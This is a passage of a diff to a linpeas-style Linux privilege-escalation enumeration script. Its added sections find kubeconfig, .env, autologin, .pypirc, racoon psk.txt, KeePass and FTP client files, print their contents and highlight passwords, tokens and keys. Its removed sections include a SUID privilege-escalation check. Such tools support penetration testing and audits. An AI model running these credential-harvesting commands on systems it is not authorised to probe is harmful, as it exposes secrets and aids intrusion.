"%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then echo_not_found "software"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then echo_not_found "software.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then echo_not_found "sysprep.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then echo_not_found "sysprep.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then echo_not_found "system.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then echo_not_found "unattend.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Other Interesting Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then echo_not_found ".lesshst"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then echo_not_found ".plan"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then echo_not_found ".profile"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then echo_not_found ".recently-used.xbel"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then echo_not_found ".rhosts"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; - - - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$PSTORAGE_KUBELET" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Kubelet Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KUBELET\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBELET" | grep -E "kubelet$" | while read f; do ls -ld "$f" | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBELET\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBELET" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" | sed -${E} "s,kube-proxy$,${SED_RED},"; find "$f" -name "kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,cluster:|certificate-authority-data:|namespace:|user:|token:,${SED_RED},g"; done; echo "";done; echo ""; fi -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" +if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Firefox Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null | while read s; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo \"$s\" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi +if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Chrome Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Autologin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; +fi + + +#-- SI) S/Key athentication +if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then + print_2title "S/Key authentication" + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) YubiKey athentication +if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then + print_2title "YubiKey authentication" + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + echo "" +fi + +if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SNMP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pypirc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Postfix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ldaprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Env Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Msmtprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Keepass Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Rocketchat Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Racoon Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Opera Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Safari Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_INFLUXDB" ] || 